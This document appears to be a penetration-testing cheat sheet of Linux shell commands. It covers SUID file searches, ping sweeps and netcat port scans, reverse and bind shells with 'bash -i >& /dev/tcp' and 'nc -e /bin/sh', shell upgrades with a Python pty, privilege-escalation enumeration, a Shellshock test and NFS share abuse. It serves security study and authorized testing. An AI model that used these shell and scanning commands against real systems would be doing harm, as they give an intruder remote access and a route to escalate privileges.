Shell and Linux / UNIX

shell / bash reference

tee - copy stdin to stdout and to an output file; -a appends instead of overwriting

File search

find / -iname 'sdb*' -exec COMMAND {} \; - find files (case-insensitive name match) and run COMMAND on each result ({} is replaced by the path)
cut -d"/" -f3 - split on the delimiter "/" and print the 3rd field
find / -perm -4000 -print - find all SUID files
find / -perm -4000 -exec ls -l {} \; - same, with a long listing of each SUID file
find / -perm -2000 -print - find all SGID files
find / -perm -2 ! -type l -ls 2>/dev/null - find world-writable files (symlinks excluded, permission errors discarded)


$1 - first argument of the script ($2 the second, and so on)

for script

for name in $(cat filesname.txt); do
    some commands with the $name variable
done

IFS - internal field separator (controls how the shell splits words)
export IFS=$'\n' - split on newlines only, so the loop above iterates line by line even when lines contain spaces

Ping Sweep - for i in $(seq 1 254); do ping -c 1 10.11.1.$i; done
Port Scan - for i in $(cat portlist.txt); do nc -nv -w1 -z $i; done


if [ -z "$1" ]; then   # true if $1 is empty or unset (use -n to test that it has a value)
    some commands
fi

Redirecting stderr

command 2> /dev/null - discard stderr (stdout is unaffected)

Reverse Shells

reverse shell (bash - linux)

bash -i >& /dev/tcp/ 0>&1
bash -c 'echo 1> /dev/tcp/x.x.x.x/x && echo open || echo false' - check whether a TCP port is open (x.x.x.x is the host, the last x the port)

netcat

  • client mode - nc -nv 25
  • server mode - nc -nlvp 4444
  • server runs a command when a client connects to the port (bind shell) - nc -lvp 4444 -e cmd.exe
  • port scan - nc -nvv -w1 -z $ipaddress $startport-$endport (-w takes a timeout in seconds; -z scans without sending data)
  • UDP - add the -u argument

reverse shell

  • setup netcat server (listener)
  • nc -nv 25 -e /bin/sh - connect client to server


ncat

  • encrypted netcat rewrite (part of nmap)
  • bind shell - ncat -lvp 4444 -e cmd.exe --allow --ssl (--allow takes the client address that is permitted to connect)
  • client - ncat -v 4444 --ssl

Fixing the Shell

  • use python pty
  • Set TERM=xterm-color
  • background the reverse shell, run stty raw -echo on the local terminal, then bring the shell back to the foreground

fix shell script - linux

python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-color
stty rows 50 cols 132


tcpdump

-A - print each packet (minus its link-level header) in ASCII; handy for capturing web pages

Python Reference

Python TTY - python -c 'import pty;pty.spawn("/bin/bash")'
Python Web server - python -m SimpleHTTPServer 8000

HEX conversion

import struct
hex(struct.unpack("I", "VALUE")[0])     # native byte order; "VALUE" must be exactly 4 bytes for format "I"
hex(struct.unpack(">I", "VALUE")[0])    # big endian
hex(struct.unpack("<I", "VALUE")[0])    # little endian
struct.pack("I", 0x2323323)             # pack an integer into a 4-byte binary string (native order)
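Worked example of the struct calls above, added here and not part of the original notes: the same 4 bytes unpacked in each byte order (showing why the ">" and "<" results differ), a pack/unpack round trip, and a small parser for a constructed 12-byte record in network order. It assumes Python 3, so inputs are bytes rather than str; the sample bytes, the record layout and the "ABCD" magic are made up for the demonstration.

```python
import struct

# Constructed sample input (not from the original page): four bytes 01 02 03 04.
SAMPLE = b"\x01\x02\x03\x04"

# Constructed 12-byte record, network (big-endian) byte order:
#   4s magic "ABCD" | H version=2 | H flags=0x8001 | I payload_len=258
RECORD = b"ABCD" + b"\x00\x02" + b"\x80\x01" + b"\x00\x00\x01\x02"
RECORD_FMT = "!4sHHI"  # "!" = network byte order, standard sizes, no padding


def unpack_all_orders(data: bytes) -> dict:
    """Unpack the same 4 bytes as an unsigned 32-bit int in every byte order.

    Results are hex strings so the effect of the byte order is visible:
    big endian reads 01 02 03 04 as 0x01020304, little endian as 0x04030201.
    """
    if len(data) != 4:
        raise ValueError("format 'I' needs exactly 4 bytes, got %d" % len(data))
    return {
        "native": hex(struct.unpack("I", data)[0]),   # depends on the host CPU
        "big": hex(struct.unpack(">I", data)[0]),
        "little": hex(struct.unpack("<I", data)[0]),
    }


def pack_roundtrip(value: int, order: str = "<") -> bytes:
    """Pack value as a 4-byte unsigned int in the given order ('<', '>' or '!')
    and verify that unpacking the result gives the original value back."""
    packed = struct.pack(order + "I", value)
    if struct.unpack(order + "I", packed)[0] != value:
        raise AssertionError("round trip failed")
    return packed


def parse_record(data: bytes) -> dict:
    """Parse the constructed header layout; reject short input and a bad magic."""
    size = struct.calcsize(RECORD_FMT)  # 4 + 2 + 2 + 4 = 12 bytes
    if len(data) < size:
        raise ValueError("record needs %d bytes, got %d" % (size, len(data)))
    magic, version, flags, payload_len = struct.unpack(RECORD_FMT, data[:size])
    if magic != b"ABCD":
        raise ValueError("bad magic %r" % magic)
    return {"version": version, "flags": hex(flags), "payload_len": payload_len}


if __name__ == "__main__":
    print(unpack_all_orders(SAMPLE))
    print(pack_roundtrip(0x2323323, ">").hex(), pack_roundtrip(0x2323323, "<").hex())
    print(parse_record(RECORD))
```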

python ftp server

# Install pyftpdlib
pip install pyftpdlib

# Run (-w allows anonymous write access; binding port 21 requires root)
python -m pyftpdlib -p 21 -w


Basic Linux Privilege Escalation - Penetration Testing Methodology

  • What's the OS? What version? What architecture?
    cat /etc/*-release
    uname -i
    lsb_release -a (Debian based OSs)

  • Who are we? Where are we?

  • Who uses the box? What users? (And which ones have a valid shell)
    cat /etc/passwd
    grep -vE "nologin|false" /etc/passwd

  • What's currently running on the box? What active network services are there?
    ps aux
    netstat -antup

  • What's installed? What kernel is being used?
    dpkg -l (Debian based OSs)
    rpm -qa (CentOS / openSUSE )
    uname -a


Shell Shock

env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id - test the local bash: a vulnerable version executes the trailing echo while importing the function and prints the message before running id




NFS

showmount -e IP - list exports
showmount -a IP - list client mount points (which hosts have which exports mounted)
mount -t nfs -o vers=3 IP:SHARE DIR - mount an NFS share (NFSv3) at DIR

  • access is decided by numeric UID/GID: a local user whose UID/GID matches the file owner on the export gets that owner's access
  • export settings
    • "root_squash" - map requests from root (UID 0) to the anonymous user nobody
    • "no_all_squash" - do not map non-root UIDs/GIDs to nobody (the default)